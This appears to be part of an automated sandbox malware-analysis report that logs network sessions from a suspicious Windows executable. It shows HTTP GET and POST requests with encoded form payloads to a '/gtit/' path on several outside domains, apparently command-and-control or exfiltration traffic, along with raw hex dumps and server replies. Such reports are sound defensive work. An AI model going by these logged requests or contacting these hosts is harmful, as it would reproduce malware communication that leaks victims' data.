74 52 59 4b 6b 5a 48 4c 79 49 67 7a 33 6d 66 46 72 32 4f 54 63 77 2f 55 50 58 46 59 78 4c 30 7a 2b 4e [TRUNCATED]
                                      Data Ascii: 6t=Bi3nlKhrPq8sEEFe8yUwvo3uec7yNZruspdIp4x9AqZQzCgmoH+VJ0sBnk0RGQB/4VF0DoeSN4cfcIKUOremLfcoLQDwm6Er+T1DXNls4kMnsURYJIQbitfy/VYJLllMdV7nbYYctWr6tGnifn3HXPu3lrrLHBKA7QIBvSzurQEeZpDy9df0wU0FQXuq73hld3xMkOuHU9qjRcEHLCYG+lqwdHCVIM+n2vUuCr2/AhVaimLiJwXqzv3SUjFu8zrs92incZZt6QaBzF7GXcN24zy/7kmWULp9uKhkbNX1rzMmitRYKkZHLyIgz3mfFr2OTcw/UPXFYxL0z+NBDGYnH1lxynL2XeO4/RQyuylpu2F297xHHX/XqNvd7KqA+zqaKugKuLXoSFkC5FxgdxbAScDqBIJp7BieWoDK0F5Cq2dI22RoUrPfZuWeCRPbo7yFwsCKwggLeryiw8dLHr08G2zd9zS0GvFE+HnyJykWSzw4IfFRs1TZxWEsrGaZIyhWdq71b57QTQOA60PXELWWXAXfDsGhVl6W4Psxr+rLBtzNUgxzcnBG4TXExst1qAhewfsLhjZl33M60c4V0QSg+D7la3IbK2RNYlspQbs86rJ01j+hjD9qrvtHM8AQrBpvE0ZFYkzwcSeUuwJv14vP0bn0vsedbNh8P14mLFEAXHPdc5xqKzfzAzBcE+KuzPuNCm356cqDlrX//UcOgE5wFMOpv5mSJJmlqu12N8xJFaHWz3ulMO81oA70v7uiGvA0zPWkiEM8uICTaCuBH9iInUhbUGRemwPNwlIhujYkhC2jbAAI+L2o7SJPRM4Wr6OKQplbSuJ1WBPwpCZKGMpGmWDS3baSMmgaOH8+Q+1wOkxVAFEb484YUl9KIv6hWY/gVMwrrwNrO9mPoJ6jrCB/qHNTFcK3D1O+L+4XrKKRDzs7u4pti968nEJpaS0ZtQWFbDf0hg70ctMqN6kkIJol/JspkCR/2BfucnqGydsk57d5R2kmd [TRUNCATED]
                                      May 4, 2024 10:10:43.140288115 CEST1289INHTTP/1.1 404 Not Found
                                      Connection: close
                                      x-litespeed-tag: 3ec_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      content-type: text/html; charset=UTF-8
                                      link: <https://tehranrizcomputer.com/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      transfer-encoding: chunked
                                      content-encoding: br
                                      vary: Accept-Encoding
                                      date: Sat, 04 May 2024 08:10:42 GMT
                                      Data Raw: 35 65 64 63 0d 0a f4 ff 1b 66 23 ec 9e 95 da 7b a8 ca 80 39 69 f5 00 a8 ce c4 18 37 f4 c7 af 3f ff fe 2a 30 76 37 c4 3a ae e7 fb 7f b3 d4 fe d7 ac 73 bc d8 df 40 47 91 4a 2e 80 00 87 1a 28 97 12 79 48 e2 1e 1c b7 65 b7 bb db d2 e1 01 89 cb 22 24 92 60 00 b0 58 65 45 ef ff 39 59 78 b3 f7 1f a6 37 8d 9b b5 d4 d9 fd cb a6 d5 7b e7 f3 52 d9 1b ec da 96 a7 bb 91 84 60 76 ef ce 89 cb e1 47 90 19 86 20 0e e1 74 e1 af 74 d6 9f f1 e5 f4 d4 53 5e 26 35 52 4b 02 24 0f 68 e2 6e b6 bd 29 53 8d d4 80 66 94 be 24 8c bd 21 92 0e aa fb 3f 47 8d 99 a0 8f d9 10 7d 39 bf 06 b3 8f e5 e7 e9 aa 9a dd b0 dd 51 4b 1c a0 97 f0 ec 35 e8 aa f9 34 4b 64 87 fe 7f df b4 72 57 52 34 cd ee 96 37 b9 0f 6d da 4d 37 8e 23 e7 22 29 74 36 ba e6 05 ff 57 55 50 85 42 50 05 30 28 98 a0 40 30 a8 22 70 8e 40 a2 ef bb ef fd 5f bf 7e 15 d0 f0 03 82 a6 c1 b6 00 bb 77 17 04 c9 11 db 07 60 83 01 c7 d8 a6 bc 0b 75 72 92 e3 7b 64 38 32 ce 04 99 fb c0 3a b6 9c e5 66 0a 67 33 39 17 84 9b 06 32 2e 94 42 2d 63 66 d3 7e ff ae dd 4a 06 21 84 a1 12 f5 31 [TRUNCATED]
                                      Data Ascii: 5edcf#{9i7?*0v7:s@GJ.(yHe"$`XeE9Yx7{R`vG ttS^&5RK$hn)Sf$!?G}9QK54KdrWR47mM7#")t6WUPBP0(@0"p@_~w`ur{d82:fg392.B-cf~J!1fM@ico~p "<Q/QAYkUA<ZNP1SiV|se-C&cec:(MY13Mf6X,\wXl0c7B!6M!3X[Y4m?x%M&A<qcUx-A_2b(\xh#)B'Jk6pF!5=Z)svgI80.;(k#&<;GLu?Q*G(b(.xcUo0v.thBlbA{O3<@QS?<t+/??/}qA~*|C
                                      May 4, 2024 10:10:43.140311003 CEST1289INData Raw: 20 04 01 0e e5 2d 33 bc fa 11 76 e6 e2 96 50 20 25 bc 80 df f7 b8 26 e6 62 7c a3 1e 5f 3b d3 59 10 48 b2 49 d4 95 35 b6 92 3a 4c a8 93 b3 5b f2 b5 ac 46 77 9e 64 24 6d 31 d8 71 cc d8 0d 99 91 af 43 df f9 ec c3 2d f9 da ef 7b 24 19 79 8f c5 85 f6
                                      Data Ascii: -3vP %&b|_;YHI5:L[Fwd$m1qC-{$yHfk`=a`FfdHp;(}?g_~tp>|'_>=Wx/Sq'2#t^ba&fKAO@WyymteoG}^?I
                                      May 4, 2024 10:10:43.140403986 CEST1289INData Raw: 97 df cb 31 35 a5 ac a7 3c 84 ac 50 44 d6 9a 99 c4 8f 45 8a 12 7c 71 c4 aa 54 eb 9b 6a a8 9c f9 67 b7 71 10 01 71 92 a4 2f 8d 42 20 32 c0 3a 05 4d 55 65 96 94 67 4e 75 09 53 41 d1 78 0b f8 09 dc bb aa 39 f7 a9 60 9c e4 19 62 3f e9 54 44 06 5d fe
                                      Data Ascii: 15<PDE|qTjgqq/B 2:MUegNuSAx9`b?TD]vy4O,)S&/:T?WnKm0gi6AU9<Ko?kxFh*@Dc?WfP4&J2$3J>j1=.1FV
                                      May 4, 2024 10:10:43.140419006 CEST1289INData Raw: 19 1c 81 f0 6c f2 a4 61 c2 2b bd 30 c6 3b 6f 65 2f 39 6a 39 99 e1 d2 b9 10 a8 66 e3 fb c3 c9 59 e2 19 59 5c 16 87 f4 71 59 20 f8 c5 f6 d2 7a 17 16 d2 59 25 b7 92 6a 5e 18 a4 6c dc 02 0a 12 a5 3a 23 9c bd e6 b5 cb 4b d3 f6 c6 a1 cd 87 21 b1 52 cb
                                      Data Ascii: la+0;oe/9j9fYY\qY zY%j^l:#K!R)x4&HK_mI+X/77P+8.~KYD*BaYJT(M56l%H *O1a9R]GFfQ&Cd:Iycn1CDB=YC!s~ (
                                      May 4, 2024 10:10:43.140552998 CEST1289INData Raw: ff 57 97 4b a5 48 46 3a 43 ee 4e 27 e1 09 5c 5d 9d c1 49 38 91 3a 50 fc af c6 4e 85 b1 6c 09 9b 94 31 5d 14 5a be cf 4c 02 02 db b6 e6 1b 8d e1 b5 63 75 4a b2 f9 21 0a 96 70 6f 18 a2 21 ac d0 06 a3 d5 e1 03 c6 09 ce 47 4b 3c 22 92 32 fa d9 25 84
                                      Data Ascii: WKHF:CN'\]I8:PNl1]ZLcuJ!po!GK<"2%Nko/cqRri[J0@teYn$SyXB+u=6XzK<cOjM7wnIN^k[t~G%s4k:X4`9YF~>
                                      May 4, 2024 10:10:43.140567064 CEST1289INData Raw: 5a 68 0d 71 ee 4c bb 2b bb ab c7 86 a7 67 7c 1c 45 c8 26 2f 54 40 06 c7 fd 48 8f 97 0f 4f 21 04 68 b6 3b 9c 4d 59 89 5e 63 77 05 27 d0 4e e1 31 58 c8 5e 78 2c 40 b6 55 c4 d5 65 d9 4a 0b d8 94 32 24 19 d0 d2 09 cd 17 eb 75 37 34 4d 06 39 4f 33 05
                                      Data Ascii: ZhqL+g|E&/T@HO!h;MY^cw'N1X^x,@UeJ2$u74M9O3lN4G;~Lh$F+EkT;@\.ML1c`Kq#7MVU.VqV'"?#+xrRQo4t-j[Ty$RG
                                      May 4, 2024 10:10:43.140691996 CEST1289INData Raw: c2 d6 2d 93 e8 11 ab 16 60 78 d7 68 2e b0 0a 3e b4 13 ad e0 df 34 8a a8 61 e8 64 18 82 4d 98 c2 ed 64 12 04 1f 3a c1 66 6e 4b a6 82 2b de cd c2 b1 ce 5b f4 65 6d 13 c3 ab e6 73 2e f0 f1 47 6e 1e a0 9b e5 11 c7 82 f3 ed 08 94 4a 35 84 a8 13 95 01
                                      Data Ascii: -`xh.>4adMd:fnK+[ems.GnJ5C;<uEn+RLj$(-Q<=y3U.jJ)]a[<1#NypI0j(qrLbyA'!|>c
                                      May 4, 2024 10:10:43.140706062 CEST1289INData Raw: cc e0 e8 28 20 4b b9 3e 0a 8f 26 00 08 08 22 27 58 23 06 8a c6 6c 96 89 1c 68 8c e9 99 b0 08 6c 63 55 b7 1b 54 41 54 2c d1 61 19 80 0f c0 8a c7 62 4a d6 55 ba dd b0 8b e1 b1 66 c5 0d 72 1f c5 7a 27 75 c3 a6 9a 77 ef 36 fc 1c d5 90 10 a6 bb 41 07
                                      Data Ascii: ( K>&"'X#lhlcUTAT,abJUfrz'uw6Aj{g|_1$mIgLqn2)+1(zU!bM8rsvt!a4O0~*GXx`Ehk,X%MM]UPOF.5M/Wr%F8=y
                                      May 4, 2024 10:10:43.140717030 CEST1289INData Raw: 73 33 69 b3 f1 2d 70 37 0c a2 ab 5c 52 31 cb 44 1a b1 5f 2c 2d 30 0f b9 99 5f f0 b2 6f 47 62 57 3b d5 20 97 85 27 20 e9 49 ef f5 49 90 8e 76 4b 28 8f a5 69 97 f3 c3 48 26 fb de b9 55 d1 7f 91 4b ec 68 8b 5e d2 a7 b2 d6 a7 d1 f5 4b fa 36 22 ad ef
                                      Data Ascii: s3i-p7\R1D_,-0_oGbW; ' IIvK(iH&UKh^K6"D!QPNm6NNEDqr8uc{N&B2;.a{{nk!(=$\,`X=?=4zD!ZEB_ARQ'I$Uf@V<c
                                      May 4, 2024 10:10:43.140731096 CEST1289INData Raw: 63 8e 5f 2b 2b 3d f6 12 1a ec f4 9e 7a 5b e2 1e 64 b5 99 d7 ef 37 ac b3 27 de 4b 83 29 ae 3b 56 a3 96 a9 d1 33 24 7b 27 f5 95 cd 70 f9 45 39 f6 f0 93 58 36 9e 8d 25 ad 8c 1d 07 8a 6e 22 97 bb 34 43 6f ba 7c 3c b5 1d a1 67 42 75 97 b1 bc 4c 23 0c
                                      Data Ascii: c_++=z[d7'K);V3${'pE9X6%n"4Co|<gBuL#[]2i?9q=JoknqDjZT4`WYjeKSIbo#S7p|\2Rx>zYu\>9I!>jN+5zEKLJI4
                                      May 4, 2024 10:10:43.528646946 CEST1289INData Raw: 9d 3f 5f 07 ad e9 cf a8 32 de c1 ff 72 6c d6 78 0b fb a6 3e 49 df e2 ed 1a 9c 0c 55 ea f9 32 b1 89 d5 2b bc f6 d3 cc 4d 79 9c 65 82 54 16 c4 5c 3a 06 be 3d 30 15 07 24 09 4d b3 f5 cc 9b 3e af a2 8e 4e 16 2b 3b 90 a9 c5 e4 62 4e 73 3f 6a 3a 83 7b
                                      Data Ascii: ?_2rlx>IU2+MyeT\:=0$M>N+;bNs?j:{Eq5J;w<*/U7JHpH7B\a0RINw]#>|LK90rU+ujI97-.h\gT,4l|\%oFM7Trd-VK


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.84971387.107.55.55804540C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      TimestampBytes transferredDirectionData
                                      May 4, 2024 10:10:45.265919924 CEST533OUTGET /gtit/?6t=MgfHm/AWJcZtJWhW2C0E/J+QQ7KNY47B4fJU/YR8UcoonAYwvhq6NXdlvEESKTg86057McGoCNEDbpDsB8WVIewJXmm9gpc24T96Iv1w6gUl0XtnH9Aw4uL+4GJqM1s/fA==&h2hLp=lXUTv2j8Xvb HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US
                                      Host: www.tehranrizcomputer.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                      May 4, 2024 10:10:46.495450020 CEST493INHTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      content-type: text/html; charset=UTF-8
                                      x-redirect-by: WordPress
                                      location: http://tehranrizcomputer.com/gtit/?6t=MgfHm/AWJcZtJWhW2C0E/J+QQ7KNY47B4fJU/YR8UcoonAYwvhq6NXdlvEESKTg86057McGoCNEDbpDsB8WVIewJXmm9gpc24T96Iv1w6gUl0XtnH9Aw4uL+4GJqM1s/fA==&h2hLp=lXUTv2j8Xvb
                                      x-litespeed-cache: miss
                                      content-length: 0
                                      date: Sat, 04 May 2024 08:10:46 GMT


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.84971435.215.179.87804540C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      TimestampBytes transferredDirectionData
                                      May 4, 2024 10:10:52.210290909 CEST818OUTPOST /gtit/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US
                                      Host: www.coppercookwarekitchen.com
                                      Origin: http://www.coppercookwarekitchen.com
                                      Content-Length: 203
                                      Connection: close
                                      Cache-Control: max-age=0
                                      Content-Type: application/x-www-form-urlencoded
                                      Referer: http://www.coppercookwarekitchen.com/gtit/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                      Data Raw: 36 74 3d 76 76 4b 70 58 6f 46 6c 6f 72 59 43 5a 37 37 72 2b 55 4e 47 4c 64 76 73 4f 45 58 41 65 41 78 6d 41 69 51 45 47 45 4d 76 56 73 58 50 65 58 46 44 34 6d 32 4e 32 70 48 68 69 52 69 36 37 2b 65 6f 5a 63 6e 76 53 57 49 52 4d 71 6d 7a 4c 36 4b 69 33 65 51 49 4d 52 64 77 52 6f 4f 53 43 4a 5a 66 79 37 6d 30 6b 41 35 34 44 42 54 55 65 39 72 5a 6f 71 56 4e 55 58 37 35 4c 67 42 55 54 34 4c 72 61 46 5a 55 75 72 7a 38 41 7a 64 4d 32 50 32 75 48 6c 79 43 38 6a 50 4a 67 75 57 73 6c 33 4e 42 34 50 47 53 66 64 67 52 69 55 57 6e 4f 55 35 74 71 41 42 2b 54 72 6a 68 51 66 75 6e 47 55 78 67 6b 46 6e 57 73 66 51 3d
                                      Data Ascii: 6t=vvKpXoFlorYCZ77r+UNGLdvsOEXAeAxmAiQEGEMvVsXPeXFD4m2N2pHhiRi67+eoZcnvSWIRMqmzL6Ki3eQIMRdwRoOSCJZfy7m0kA54DBTUe9rZoqVNUX75LgBUT4LraFZUurz8AzdM2P2uHlyC8jPJguWsl3NB4PGSfdgRiUWnOU5tqAB+TrjhQfunGUxgkFnWsfQ=
                                      May 4, 2024 10:10:52.514086962 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sat, 04 May 2024 08:10:52 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.84971535.215.179.87804540C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      TimestampBytes transferredDirectionData
                                      May 4, 2024 10:10:55.056210995 CEST838OUTPOST /gtit/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US
                                      Host: www.coppercookwarekitchen.com
                                      Origin: http://www.coppercookwarekitchen.com
                                      Content-Length: 223
                                      Connection: close
                                      Cache-Control: max-age=0
                                      Content-Type: application/x-www-form-urlencoded
                                      Referer: http://www.coppercookwarekitchen.com/gtit/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                      Data Raw: 36 74 3d 76 76 4b 70 58 6f 46 6c 6f 72 59 43 44 62 4c 72 35 31 4e 47 4a 39 76 76 44 55 58 41 56 67 78 69 41 69 63 45 47 46 4a 79 53 66 2f 50 65 31 4e 44 2f 6a 61 4e 7a 70 48 68 33 68 69 37 6b 75 65 7a 5a 63 61 61 53 57 30 52 4d 71 79 7a 4c 37 57 69 33 4a 38 4c 4e 42 64 32 63 49 4f 51 50 70 5a 66 79 37 6d 30 6b 41 39 43 44 42 62 55 65 4d 62 5a 70 49 39 4b 58 58 37 36 44 41 42 55 42 49 4c 6e 61 46 59 78 75 72 43 68 41 78 31 4d 32 4b 4b 75 48 77 4f 42 31 6a 50 50 39 2b 58 6c 32 6c 73 36 2f 66 4b 78 5a 74 73 42 6d 6c 57 50 47 43 55 48 77 69 4a 34 51 72 4c 4b 51 63 47 52 44 6a 73 49 2b 6d 33 6d 79 49 46 70 31 78 51 73 30 48 36 67 6d 37 32 32 46 5a 64 63 69 66 69 44
                                      Data Ascii: 6t=vvKpXoFlorYCDbLr51NGJ9vvDUXAVgxiAicEGFJySf/Pe1ND/jaNzpHh3hi7kuezZcaaSW0RMqyzL7Wi3J8LNBd2cIOQPpZfy7m0kA9CDBbUeMbZpI9KXX76DABUBILnaFYxurChAx1M2KKuHwOB1jPP9+Xl2ls6/fKxZtsBmlWPGCUHwiJ4QrLKQcGRDjsI+m3myIFp1xQs0H6gm722FZdcifiD
                                      May 4, 2024 10:10:55.360435963 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sat, 04 May 2024 08:10:55 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.84971635.215.179.87804540C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      TimestampBytes transferredDirectionData
                                      May 4, 2024 10:10:57.911011934 CEST1855OUTPOST /gtit/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US
                                      Host: www.coppercookwarekitchen.com
                                      Origin: http://www.coppercookwarekitchen.com
                                      Content-Length: 1239
                                      Connection: close
                                      Cache-Control: max-age=0
                                      Content-Type: application/x-www-form-urlencoded
                                      Referer: http://www.coppercookwarekitchen.com/gtit/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                      Data Raw: 36 74 3d 76 76 4b 70 58 6f 46 6c 6f 72 59 43 44 62 4c 72 35 31 4e 47 4a 39 76 76 44 55 58 41 56 67 78 69 41 69 63 45 47 46 4a 79 53 5a 6e 50 66 48 31 44 2f 41 69 4e 30 70 48 68 72 78 69 2b 6b 75 65 79 5a 63 79 57 53 57 35 6d 4d 6f 4b 7a 45 35 65 69 67 49 38 4c 55 52 64 32 56 6f 4f 52 43 4a 5a 77 79 37 32 77 6b 44 56 43 44 42 62 55 65 50 44 5a 2f 71 56 4b 52 58 37 35 4c 67 42 59 54 34 4c 4c 61 46 67 48 75 71 33 57 41 41 56 4d 32 71 36 75 46 43 6d 42 36 6a 50 4e 2b 2b 58 39 32 6c 67 6c 2f 66 57 58 5a 75 77 72 6d 69 61 50 51 6d 31 6b 70 6d 55 6a 4b 59 62 36 59 74 75 57 61 79 73 61 32 57 76 6a 36 4b 39 35 69 48 41 41 36 48 2f 75 6c 72 66 79 45 59 56 58 79 76 33 50 2b 5a 76 6e 70 6e 4a 30 76 6e 66 4b 32 77 79 72 4e 6d 50 48 58 78 51 64 48 65 41 47 2f 62 49 4c 56 6c 77 6d 4d 63 63 32 6a 55 46 46 31 43 37 79 65 33 72 57 4b 62 6e 32 52 4f 43 61 6d 52 41 36 34 6d 75 4a 2b 77 34 59 48 76 4c 6b 4f 41 74 52 71 73 4c 4f 37 57 43 75 6c 42 33 68 38 7a 6c 56 64 6a 54 6e 38 57 32 64 34 30 4b 49 55 45 38 56 6b 34 64 [TRUNCATED]
                                      Data Ascii: 6t=vvKpXoFlorYCDbLr51NGJ9vvDUXAVgxiAicEGFJySZnPfH1D/AiN0pHhrxi+kueyZcyWSW5mMoKzE5eigI8LURd2VoORCJZwy72wkDVCDBbUePDZ/qVKRX75LgBYT4LLaFgHuq3WAAVM2q6uFCmB6jPN++X92lgl/fWXZuwrmiaPQm1kpmUjKYb6YtuWaysa2Wvj6K95iHAA6H/ulrfyEYVXyv3P+ZvnpnJ0vnfK2wyrNmPHXxQdHeAG/bILVlwmMcc2jUFF1C7ye3rWKbn2ROCamRA64muJ+w4YHvLkOAtRqsLO7WCulB3h8zlVdjTn8W2d40KIUE8Vk4dYeHEuRVHfhY//TfLDcUQfhiZuLfuUBXs76iXTlJpw5PLK7v0tz9IZi5jQVVCXNTPzibbKEP1XmrVMBmCyxtLcce7tJ7aSj5obqzgw1N39kVRBbjO/Qmd6RBWXUCz7S0LxdohdXclNlokWF+D5zV+Mg2/CEc7YKx30kusg8jdP7YpZ3mXjyaZh6JjlU06d6JQlXxcOU1t7C+Eo9WYEZ3nnADPLbP119yz0f1BYlNUCEA1PFdh+tDBXBT2apBV9xS9Vc9cqZ8nrJLxBma1XIFTYZUzWUyk0GfAKl+dmnSLd1Q1MIKR7FzoO9qief9KWOUmQDp3De7wKCtkPXDNpqBNAnLUm7XdJ4pPinZYKmihaF9vHPj5+7+ErKtjKRCd5/bEcEyJMAjFVgRV3zGo3yF5fC7lqDsUc3NuKirckVzxTTG4LMdPHnUZ6SuS5+UrlJyQ7DosiyFTpX/STyCCeoGJKGyvs8TtQUhhjFAsfqFxNaAA6RShcaQ6HZkfWO6uBXjvXhMc1SLe2PVI1+r8wpPri8RPcHXQQPADb5IbqNZmFL+xX2L3ocPrxMyPU6N613fgFg/KahamD0oog3NPk2PmgcduJrVMO1dRzGTR/4QuHE39FA8qY0ZeNBbgNo2HPbAUQMFP30DTny7iFPzhvGf/gDv08H+KUL9Yhd [TRUNCATED]
                                      May 4, 2024 10:10:58.215990067 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sat, 04 May 2024 08:10:58 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

